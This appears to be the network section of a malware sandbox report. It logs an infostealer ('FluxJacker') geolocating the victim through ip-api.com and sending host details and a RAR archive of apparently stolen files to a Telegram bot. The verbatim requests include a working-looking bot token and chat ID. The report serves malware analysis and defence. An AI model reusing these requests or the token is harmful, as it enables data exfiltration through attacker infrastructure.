                                                                                                                                                                                                                              Oct 13, 2024 19:05:39.619153976 CEST700049739198.23.219.104192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:05:39.619179964 CEST700049739198.23.219.104192.168.2.4
                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                              Oct 13, 2024 19:01:21.353698015 CEST4927853192.168.2.41.1.1.1
                                                                                                                                                                                                                              Oct 13, 2024 19:01:21.361135960 CEST53492781.1.1.1192.168.2.4
                                                                                                                                                                                                                              Oct 13, 2024 19:01:47.338709116 CEST5056353192.168.2.41.1.1.1
                                                                                                                                                                                                                              Oct 13, 2024 19:01:47.346216917 CEST53505631.1.1.1192.168.2.4
                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                              Oct 13, 2024 19:01:21.353698015 CEST192.168.2.41.1.1.10xe8cStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Oct 13, 2024 19:01:47.338709116 CEST192.168.2.41.1.1.10x3a31Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                              Oct 13, 2024 19:01:21.361135960 CEST1.1.1.1192.168.2.40xe8cNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Oct 13, 2024 19:01:47.346216917 CEST1.1.1.1192.168.2.40x3a31No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              • api.telegram.org
                                                                                                                                                                                                                              • ip-api.com
                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              0192.168.2.449749208.95.112.1802892C:\Users\user\Desktop\sB2ClgrGng.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              Oct 13, 2024 19:01:47.352235079 CEST116OUTGET /json/?fields=225545 HTTP/1.1
                                                                                                                                                                                                                              Host: ip-api.com
                                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                                              User-Agent: python-urllib3/2.2.2
                                                                                                                                                                                                                              Oct 13, 2024 19:01:47.903525114 CEST379INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Sun, 13 Oct 2024 17:01:47 GMT
                                                                                                                                                                                                                              Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                              Content-Length: 202
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              X-Ttl: 60
                                                                                                                                                                                                                              X-Rl: 44
                                                                                                                                                                                                                              Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
                                                                                                                                                                                                                              Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-33.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.33"}


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              0192.168.2.449738149.154.167.2204437280C:\Users\user\AppData\Local\Temp\bound.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-13 17:01:22 UTC465OUTGET /bot7151126433:AAGnFv8HooRtSQ_cEeb4ANUyyyQ1LbT0Ehc/sendMessage?chat_id=-1002219810475&text=%E2%98%A0%20%5BFluxJacker%20@mrfluxdev%5D%0D%0A%0D%0ANew%20CLient%20:%20%0D%0A75AB9E535C7E64F8DEDE%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%209FGY78%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroup%20:%20RK%20New%20Staup HTTP/1.1
                                                                                                                                                                                                                              Host: api.telegram.org
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              2024-10-13 17:01:22 UTC388INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Server: nginx/1.18.0
                                                                                                                                                                                                                              Date: Sun, 13 Oct 2024 17:01:22 GMT
                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                              Content-Length: 486
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                                                              2024-10-13 17:01:22 UTC486INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 32 33 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 35 31 31 32 36 34 33 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 72 69 6b 67 72 61 62 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 72 6b 67 72 61 62 73 7a 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 31 30 30 32 32 31 39 38 31 30 34 37 35 2c 22 74 69 74 6c 65 22 3a 22 72 69 6b 67 72 61 62 73 22 2c 22 74 79 70 65 22 3a 22 73 75 70 65 72 67 72 6f 75 70 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 38 38 33 38 38 38 32 2c 22 74 65 78 74 22 3a 22 5c 75 32 36 32 30 20 5b 46 6c 75 78 4a 61 63 6b 65 72 20 40 6d 72 66 6c 75 78 64 65 76 5d 5c 6e 5c 6e
                                                                                                                                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":4231,"from":{"id":7151126433,"is_bot":true,"first_name":"rikgrabs","username":"rkgrabszbot"},"chat":{"id":-1002219810475,"title":"rikgrabs","type":"supergroup"},"date":1728838882,"text":"\u2620 [FluxJacker @mrfluxdev]\n\n


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              1192.168.2.449750149.154.167.2204432892C:\Users\user\Desktop\sB2ClgrGng.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-13 17:01:48 UTC268OUTPOST /bot7151126433:AAGnFv8HooRtSQ_cEeb4ANUyyyQ1LbT0Ehc/sendDocument HTTP/1.1
                                                                                                                                                                                                                              Host: api.telegram.org
                                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                                              Content-Length: 718866
                                                                                                                                                                                                                              User-Agent: python-urllib3/2.2.2
                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=eb9cccf662e2649c85fa5e8d1397dd63
                                                                                                                                                                                                                              2024-10-13 17:01:48 UTC16384OUTData Raw: 2d 2d 65 62 39 63 63 63 66 36 36 32 65 32 36 34 39 63 38 35 66 61 35 65 38 64 31 33 39 37 64 64 36 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 46 75 6e 64 65 76 2d 6a 6f 6e 65 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 23 6e bf e2 21 04 00 00 01 0f 54 49 49 97 6f a3 fa 32 54 09 a4 5e 68 06 25 17 5e a4 cb 2c 59 01 93 c2 c7 80 c1 96 2f ff 73 dd 34 2c dc 27 97 8c 90 e9 65 0f e9 1d c9 18 7b 75 1b d2 5e 19 bf 9c 15 a4 8a a0 98 80 1d a7 af 88 b4 b8 38 bc c3 77 e9 99 6c 50 09 aa e2 27 23 9a 09
                                                                                                                                                                                                                              Data Ascii: --eb9cccf662e2649c85fa5e8d1397dd63Content-Disposition: form-data; name="document"; filename="Fundev-user.rar"Content-Type: application/octet-streamRar!#n!TIIo2T^h%^,Y/s4,'e{u^8wlP'#
                                                                                                                                                                                                                              2024-10-13 17:01:48 UTC16384OUTData Raw: d8 98 b7 b4 4c 06 b9 26 6d 3e d8 04 f2 83 cb aa 11 f7 5c 56 d8 00 68 84 2b 69 32 bc 21 3e ec 9a 25 e9 ad e5 9d 35 89 a9 9b cb 55 1e 87 4d 0c 60 2e 18 54 cd f7 e1 a7 d7 da 9a cd 7b c9 3b 4b 39 37 77 41 e4 08 e7 0d 5d cc fe 0c ba 31 f4 ff f0 7e 46 0c 3d de 86 80 a3 54 b7 07 21 6c 4a 15 27 5f 33 2b 5c 85 8d c8 87 f9 95 1d 85 e5 65 7c 8e af b5 8a d5 42 0a 48 43 c5 9e ea 6b 7b 50 af d3 66 c7 e3 e6 24 02 eb c1 bb 85 9c 34 b1 8f b7 92 0d 41 97 71 fa 5b 66 26 25 63 c4 2c 39 01 1c ed 87 57 bc f1 56 94 93 50 d0 d9 b5 d1 35 49 f6 af 28 a8 da 68 ab 43 8e b5 4b 3e 4c 5b 57 ea e4 c5 28 fd 6f 01 39 76 dd 6b df 35 ba 1e e6 d6 ee 9f 78 4e c9 e5 bb a5 e0 ac a6 21 39 81 5d 30 8f ee dc d1 a9 c8 c0 0f 66 91 31 72 03 65 82 b5 47 66 ab 8f 4f a7 fc 94 58 58 9f d0 1f 29 ee 82 78
                                                                                                                                                                                                                              Data Ascii: L&m>\Vh+i2!>%5UM`.T{;K97wA]1~F=T!lJ'_3+\e|BHCk{Pf$4Aq[f&%c,9WVP5I(hCK>L[W(o9vk5xN!9]0f1reGfOXX)x
                                                                                                                                                                                                                              2024-10-13 17:01:48 UTC16384OUTData Raw: 68 23 66 e5 3f 8e 31 f1 f7 30 83 4e 5f 8b 0d 31 ae 28 d6 64 c8 ae 8c f6 00 52 51 27 d2 2d 60 7f aa 20 f2 b5 14 0d 34 40 ef 49 d3 4e ae aa 08 a6 9e 5b c6 46 e1 1f 3a ff 9e 01 5f 88 da fe b2 e2 94 30 de e8 17 93 95 9f a8 d3 99 88 5a 71 86 aa f6 64 8c 69 98 e3 b9 d3 49 89 de f4 b8 48 7f fb 68 49 b5 e2 53 a8 07 4e 50 2f ab 30 93 1e 2e 88 6f cb 8c ed f6 f2 05 f2 7d 61 14 07 60 a3 8a 8e 4a 6e 03 9f 86 e5 1b 4a c3 4a 89 9d 63 82 55 12 0c 8e 2f 6f 6a be 46 a5 9a f7 e5 4e 00 0a f9 0d b1 05 2b 21 d7 69 d7 f2 2d dd 54 7f 80 15 0c 85 0c 58 8f 32 d1 3e 84 bd e1 65 ab 7c 26 f8 20 8b dc db 6f a8 0f 79 8f 37 cd 4d d1 e8 e8 ca 0c d1 2f 47 4e 60 37 1e 8b b9 a3 2e 80 4c a6 e2 61 3a 8a 6b f8 51 7f a2 fe 52 87 9b 68 2a d0 0e b4 d1 4a aa 16 98 1d 96 f2 4f 5e 41 e0 42 fb 41 9b
                                                                                                                                                                                                                              Data Ascii: h#f?10N_1(dRQ'-` 4@IN[F:_0ZqdiIHhISNP/0.o}a`JnJJcU/ojFN+!i-TX2>e|& oy7M/GN`7.La:kQRh*JO^ABA
                                                                                                                                                                                                                              2024-10-13 17:01:48 UTC16384OUTData Raw: cf 88 7d 86 8b b3 65 e1 92 90 db c0 64 89 cb 96 8e b2 6a 1a 2c de 11 fc 87 0d d7 bc 7e ee 9c 2b e9 11 cc f5 45 b8 ab 85 64 d0 4f 33 ed 91 59 ef 61 82 f2 df 79 f4 5a 3b 47 b4 fa 3f 20 40 e1 a0 3b de e2 a9 bb 0a a5 0d 55 a7 8d 66 a4 73 44 a1 5d 0a 37 04 bb 27 8b 75 1f 6b b6 c2 93 20 33 d5 35 be ed 74 f1 a5 9f 55 a4 31 bb b2 87 25 21 cd 86 2a 54 f5 f6 d2 e7 f6 2b e6 98 1b 15 f7 78 89 dc 23 b2 07 a8 98 5b 77 10 f3 72 f4 26 33 9b 45 ee a6 2a ae fa 87 95 d5 88 1b 17 81 d4 bc 3f 1e aa e7 56 b8 a4 2d 06 ef 99 8d bb 39 c1 42 af 60 87 dd bb 38 17 6f c7 d5 bc 22 33 50 1a bf af a7 13 4f 8b 19 97 08 51 69 f5 27 b5 56 f4 bb a0 3b 52 9d 38 e4 34 75 4a 94 20 28 1c 68 32 2d c3 0d 78 52 1a ac 24 b1 22 f0 b7 f1 bf 77 8a 96 b7 04 cc 8a 56 98 63 f9 67 af 3d e8 8c f6 d1 f7 3e
                                                                                                                                                                                                                              Data Ascii: }edj,~+EdO3YayZ;G? @;UfsD]7'uk 35tU1%!*T+x#[wr&3E*?V-9B`8o"3POQi'V;R84uJ (h2-xR$"wVcg=>
                                                                                                                                                                                                                              2024-10-13 17:01:48 UTC16384OUTData Raw: 5d 13 63 af 3b 92 05 6b 73 ef 53 28 b3 7c f2 2c f6 a5 1e 52 9a d9 7b 97 16 09 4e 57 5b 6e 6f 51 55 63 aa ee 9c 06 7e f3 1d ee 48 d8 e7 47 21 af f9 17 d7 d4 69 26 16 3b 0c e3 06 47 61 8d fa 00 2b 8e 4e 4f 60 2b b9 80 0a 8c f8 31 59 c4 32 41 07 2f 59 d3 91 76 65 4e eb fd ff 89 c9 02 a6 5f d2 a9 ee ee 88 e4 51 20 90 89 d3 b5 36 e5 48 11 4c 5e 73 66 64 e4 1b 29 3b 38 24 0d b6 77 51 06 8c 6b d2 0e cc d9 46 14 bd f7 3f a9 b5 12 a8 83 2a f6 f8 ee 56 59 f6 b9 88 fa 91 a4 f0 91 a0 44 f3 e3 47 78 37 65 1b f8 2e 0d 03 61 21 50 78 77 ba 16 60 d3 19 e3 de 26 88 17 66 ba 7f 7b 38 9a dc cc 75 2a c6 f7 c3 ab a3 19 1b 8d a3 32 53 0c 49 3f 67 cc f0 97 30 10 36 ae bb a6 55 79 15 4b b0 1a 5d 27 7d 4b 35 61 78 93 a2 f1 6c 4e 32 00 67 30 4c b8 6f 40 e4 a7 67 5a cd be a0 08 c4
                                                                                                                                                                                                                              Data Ascii: ]c;ksS(|,R{NW[noQUc~HG!i&;Ga+NO`+1Y2A/YveN_Q 6HL^sfd);8$wQkF?*VYDGx7e.a!Pxw`&f{8u*2SI?g06UyK]'}K5axlN2g0Lo@gZ
                                                                                                                                                                                                                              2024-10-13 17:01:48 UTC16384OUTData Raw: 97 f8 da 76 bd 17 4e b3 b1 ac 79 d1 62 4f 51 d6 35 6e f9 30 f2 11 64 c3 6f 11 f2 9d a2 e9 f7 28 68 4e 01 d3 52 23 8a 65 59 09 fc fe 67 b6 3c 24 95 0d ad 06 27 6b f7 18 2a 2d fe c5 4f 6e 8c 7e 63 0a 11 e4 8c 89 e0 1d 09 80 02 c8 36 1b bd 3d 04 e5 07 be 03 d6 bb d2 34 44 8e ac 62 af 2c aa dd 83 9a e3 8c b4 0a 1e 0d 38 68 a9 cb 82 e9 76 57 7d e5 f5 2c 56 ff 4c da bc 60 b1 2c d7 85 05 a9 b8 28 99 9c f1 8c 4c f7 87 d0 79 c9 45 68 1e a4 44 af 97 7c f9 5c 76 e6 e1 d6 e7 67 51 2d 45 6b ca c6 3f 0e 83 88 f1 44 dc 80 f3 9f d6 61 cf 24 c9 ea 8c ac 48 42 72 99 89 99 80 8d bb d8 5b 7a b8 93 db 97 38 18 06 03 c2 45 8c 51 1f 7a f2 5f cc 7b 24 76 4b 5c 10 7c ef be c5 d0 88 f4 30 34 2a 4d dd 93 65 42 f8 c1 b6 91 df b5 76 f4 ad a8 63 17 5e e0 25 56 d9 ce b5 3e 0e c3 cd 66
                                                                                                                                                                                                                              Data Ascii: vNybOQ5n0do(hNR#eYg<$'k*-On~c6=4Db,8hvW},VL`,(LyEhD|\vgQ-Ek?Da$HBr[z8EQz_{$vK\|04*MeBvc^%V>f
                                                                                                                                                                                                                              2024-10-13 17:01:48 UTC16384OUTData Raw: 4e b7 8f e5 fa ae 44 10 e9 58 d3 8f f2 61 00 b2 75 d0 03 a4 ce f7 1e 6b b1 f4 58 9f a8 8a 6f 5c 11 33 f7 c9 d4 fc 0c 91 ff 13 d1 1d ff be a9 31 8e 74 a4 a6 07 44 70 b0 e7 e9 aa 2b 29 52 cd a8 5b 5e f9 2e de 39 21 08 37 eb c4 9d e0 4a 74 16 06 5f 2a fd a1 e6 db 85 45 ef f7 91 3a cc 20 a3 9d 06 df a0 86 e0 91 b6 ab cb e8 e6 d1 ea d3 ec e6 3d d9 24 d5 b7 06 29 03 2d 4f 5d dc 72 51 c3 af 40 e9 0e d2 5d 38 6f 73 ef 66 ee d4 e5 44 fa 81 5b 64 6a 74 e5 54 20 da 4d 85 a4 12 e6 f3 b3 d5 08 19 ca 0a b3 d6 f8 1b 60 f3 fc d0 32 2c c9 ac eb 6b 0e 6a d8 9f 0b fd 78 51 a7 4b cf 1c 54 d5 fb 8e 50 37 04 4b 62 d2 29 4e 3b 25 97 10 35 4b f9 72 28 ba c1 57 8f 6b 6b 4a 59 4f 77 22 67 51 83 db 48 1d cd 85 34 d4 52 40 ad b3 87 c6 f6 b5 53 ec 2d 90 93 04 79 70 77 dd f9 4f 59 d9
                                                                                                                                                                                                                              Data Ascii: NDXaukXo\31tDp+)R[^.9!7Jt_*E: =$)-O]rQ@]8osfD[djtT M`2,kjxQKTP7Kb)N;%5Kr(WkkJYOw"gQH4R@S-ypwOY
                                                                                                                                                                                                                              2024-10-13 17:01:48 UTC16384OUTData Raw: f4 55 f5 04 8b e7 aa 08 19 cd 77 cb 02 16 4b 95 47 10 de 87 2f 68 8c 43 92 65 2d 0f 04 fb d2 79 2a b1 2a 71 96 a6 d7 4a 08 15 ee 54 26 89 43 b4 e2 e6 87 e6 1d 56 e7 ea 75 19 5b a9 e1 06 da a7 6d 56 6a f3 92 4b eb a1 23 56 dc 06 a8 dd 4c a7 1b e0 15 3f 42 2d e6 37 c6 21 3f 62 f6 ed a5 ec b3 0b 55 74 1b fb 9b f6 91 5c 19 ab 87 6f 87 87 fe 57 64 43 1d 90 4c c7 8c b4 4d 9a 97 a9 04 5a b7 17 3f b1 8a 2b bb 92 62 d7 e5 05 12 0a c5 64 80 d2 e4 7b 45 49 fa ba af b5 fc 44 be af 9e a7 1b 2c b3 b2 d9 c4 a8 4b 30 2b f1 66 84 0f 97 10 1c 54 16 03 ee ff 8b aa 82 00 1d 80 df 11 6d 9b fe e9 f2 bb b0 a2 e3 0d 9c e7 0d 11 f4 63 43 4c 2f 63 9a 91 e1 ec 9a 18 35 b8 0b 35 f4 e2 97 30 5a 20 d8 b8 58 99 d2 48 3b 7a cf e5 23 c5 79 1f aa 62 fc 06 c2 29 e2 df 9f 25 fb e6 32 5e 5f
                                                                                                                                                                                                                              Data Ascii: UwKG/hCe-y**qJT&CVu[mVjK#VL?B-7!?bUt\oWdCLMZ?+bd{EID,K0+fTmcCL/c550Z XH;z#yb)%2^_
                                                                                                                                                                                                                              2024-10-13 17:01:48 UTC16384OUTData Raw: 9d 57 f6 e7 27 cc 2b dd 8b 92 33 39 d8 91 ad 23 ae 00 5e c5 74 e6 85 e2 a7 03 f2 3b 9d 61 6a cb f4 d0 1c 7d ba 32 ac 25 94 46 00 c9 70 06 84 e8 47 61 12 94 18 6b ce 67 6a f4 06 2e 5a d7 98 bc af c1 1e 33 c1 ab b8 e5 a6 7b ce 11 90 0d bb 51 de f5 5b 6a 29 7e 88 4b 21 d3 a3 22 a0 07 ef 27 42 36 36 48 29 91 80 76 43 46 e2 6e 72 27 8d 54 01 37 f2 2b e8 f8 18 95 00 5f 32 f7 62 03 bc 52 07 c2 fa 94 ef 2c f8 5b 07 21 c4 6c 4f 2e 87 b7 c1 6c 02 08 92 e0 7f c2 f8 06 ee f5 38 97 38 ef 4c fd f7 d9 d7 f5 e0 77 62 b4 e3 45 95 eb b7 07 e3 2c a6 b2 f5 6a 0f 5a aa f0 13 21 5a 30 ee d1 f7 c4 fd 80 26 67 9d 7c 6f 70 3c 70 78 8f 09 24 5e 2e e8 b9 bc b9 57 72 f1 49 dc 95 31 39 34 c0 8a a5 9f e8 ef fd b9 68 9c c5 1a 43 0f 52 82 4f 42 f5 e8 6d 5e ac 1c 3a b1 7d 52 83 b4 60 04
                                                                                                                                                                                                                              Data Ascii: W'+39#^t;aj}2%FpGakgj.Z3{Q[j)~K!"'B66H)vCFnr'T7+_2bR,[!lO.l88LwbE,jZ!Z0&g|op<px$^.WrI194hCROBm^:}R`
                                                                                                                                                                                                                              2024-10-13 17:01:48 UTC16384OUTData Raw: 79 e9 6a 12 a0 b0 fc 6c 38 47 0c 17 54 75 35 c8 47 1a 39 2c 62 01 6d a5 9d 65 6e c2 dd bb cb 78 e8 53 b5 29 28 96 95 0f fa ce bb 91 80 2c da 9e 76 f5 0a b6 b6 e7 de 41 55 e2 c0 f8 ec f2 a8 01 af fc 38 0e c7 ea 11 d0 4a c5 c9 af 9f b5 5e 2f 59 92 76 b1 73 5f 38 c2 6b d8 03 66 fc cb e5 60 3a da f6 18 19 4e 03 c0 77 1a e4 23 c4 c8 8a 6a 92 8b 12 af 83 39 48 9a 71 9c d0 e6 a9 31 9e 7f ea 74 36 ae 4e de 51 c2 d7 ed b1 62 10 06 03 c2 0d 61 f6 5f cb 99 29 2e e6 1c f0 5b a4 9c 3f a1 3f 13 29 30 74 9e a4 f9 cb 14 1c d6 c4 a9 35 fa 4c dd 4a 38 35 b2 27 f3 21 19 c2 c4 24 44 e9 d8 ce 0e 39 bb 56 22 38 4a 23 63 e6 4c 69 89 1a 22 8d 19 55 bf ee 36 79 9c 37 e1 40 4d d9 d2 c1 0f 0f 5f 9c 0a 5b 6b b0 f5 f8 db 31 43 0e 81 e2 8f 77 fe 7a 22 fc 12 78 bc 1c 13 a0 c0 4b 3b 57
                                                                                                                                                                                                                              Data Ascii: yjl8GTu5G9,bmenxS)(,vAU8J^/Yvs_8kf`:Nw#j9Hq1t6NQba_).[??)0t5LJ85'!$D9V"8J#cLi"U6y7@M_[k1Cwz"xK;W
                                                                                                                                                                                                                              2024-10-13 17:01:50 UTC389INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Server: nginx/1.18.0
                                                                                                                                                                                                                              Date: Sun, 13 Oct 2024 17:01:50 GMT
                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                              Content-Length: 1660
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              2192.168.2.449751149.154.167.2204432892C:\Users\user\Desktop\sB2ClgrGng.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-13 17:01:51 UTC268OUTPOST /bot7151126433:AAGnFv8HooRtSQ_cEeb4ANUyyyQ1LbT0Ehc/sendDocument HTTP/1.1
                                                                                                                                                                                                                              Host: api.telegram.org
                                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                                              Content-Length: 718861
                                                                                                                                                                                                                              User-Agent: python-urllib3/2.2.2
                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=e0ec0acbd56620af43602a9b073e8d82
                                                                                                                                                                                                                              2024-10-13 17:01:51 UTC16384OUTData Raw: 2d 2d 65 30 65 63 30 61 63 62 64 35 36 36 32 30 61 66 34 33 36 30 32 61 39 62 30 37 33 65 38 64 38 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 46 75 6e 64 65 76 2d 6a 6f 6e 65 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 23 6e bf e2 21 04 00 00 01 0f 54 49 49 97 6f a3 fa 32 54 09 a4 5e 68 06 25 17 5e a4 cb 2c 59 01 93 c2 c7 80 c1 96 2f ff 73 dd 34 2c dc 27 97 8c 90 e9 65 0f e9 1d c9 18 7b 75 1b d2 5e 19 bf 9c 15 a4 8a a0 98 80 1d a7 af 88 b4 b8 38 bc c3 77 e9 99 6c 50 09 aa e2 27 23 9a 09
                                                                                                                                                                                                                              Data Ascii: --e0ec0acbd56620af43602a9b073e8d82Content-Disposition: form-data; name="document"; filename="Fundev-user.rar"Content-Type: application/octet-streamRar!#n!TIIo2T^h%^,Y/s4,'e{u^8wlP'#
                                                                                                                                                                                                                              2024-10-13 17:01:51 UTC16384OUTData Raw: d8 98 b7 b4 4c 06 b9 26 6d 3e d8 04 f2 83 cb aa 11 f7 5c 56 d8 00 68 84 2b 69 32 bc 21 3e ec 9a 25 e9 ad e5 9d 35 89 a9 9b cb 55 1e 87 4d 0c 60 2e 18 54 cd f7 e1 a7 d7 da 9a cd 7b c9 3b 4b 39 37 77 41 e4 08 e7 0d 5d cc fe 0c ba 31 f4 ff f0 7e 46 0c 3d de 86 80 a3 54 b7 07 21 6c 4a 15 27 5f 33 2b 5c 85 8d c8 87 f9 95 1d 85 e5 65 7c 8e af b5 8a d5 42 0a 48 43 c5 9e ea 6b 7b 50 af d3 66 c7 e3 e6 24 02 eb c1 bb 85 9c 34 b1 8f b7 92 0d 41 97 71 fa 5b 66 26 25 63 c4 2c 39 01 1c ed 87 57 bc f1 56 94 93 50 d0 d9 b5 d1 35 49 f6 af 28 a8 da 68 ab 43 8e b5 4b 3e 4c 5b 57 ea e4 c5 28 fd 6f 01 39 76 dd 6b df 35 ba 1e e6 d6 ee 9f 78 4e c9 e5 bb a5 e0 ac a6 21 39 81 5d 30 8f ee dc d1 a9 c8 c0 0f 66 91 31 72 03 65 82 b5 47 66 ab 8f 4f a7 fc 94 58 58 9f d0 1f 29 ee 82 78
                                                                                                                                                                                                                              Data Ascii: L&m>\Vh+i2!>%5UM`.T{;K97wA]1~F=T!lJ'_3+\e|BHCk{Pf$4Aq[f&%c,9WVP5I(hCK>L[W(o9vk5xN!9]0f1reGfOXX)x
                                                                                                                                                                                                                              2024-10-13 17:01:51 UTC16384OUTData Raw: 68 23 66 e5 3f 8e 31 f1 f7 30 83 4e 5f 8b 0d 31 ae 28 d6 64 c8 ae 8c f6 00 52 51 27 d2 2d 60 7f aa 20 f2 b5 14 0d 34 40 ef 49 d3 4e ae aa 08 a6 9e 5b c6 46 e1 1f 3a ff 9e 01 5f 88 da fe b2 e2 94 30 de e8 17 93 95 9f a8 d3 99 88 5a 71 86 aa f6 64 8c 69 98 e3 b9 d3 49 89 de f4 b8 48 7f fb 68 49 b5 e2 53 a8 07 4e 50 2f ab 30 93 1e 2e 88 6f cb 8c ed f6 f2 05 f2 7d 61 14 07 60 a3 8a 8e 4a 6e 03 9f 86 e5 1b 4a c3 4a 89 9d 63 82 55 12 0c 8e 2f 6f 6a be 46 a5 9a f7 e5 4e 00 0a f9 0d b1 05 2b 21 d7 69 d7 f2 2d dd 54 7f 80 15 0c 85 0c 58 8f 32 d1 3e 84 bd e1 65 ab 7c 26 f8 20 8b dc db 6f a8 0f 79 8f 37 cd 4d d1 e8 e8 ca 0c d1 2f 47 4e 60 37 1e 8b b9 a3 2e 80 4c a6 e2 61 3a 8a 6b f8 51 7f a2 fe 52 87 9b 68 2a d0 0e b4 d1 4a aa 16 98 1d 96 f2 4f 5e 41 e0 42 fb 41 9b
                                                                                                                                                                                                                              Data Ascii: h#f?10N_1(dRQ'-` 4@IN[F:_0ZqdiIHhISNP/0.o}a`JnJJcU/ojFN+!i-TX2>e|& oy7M/GN`7.La:kQRh*JO^ABA
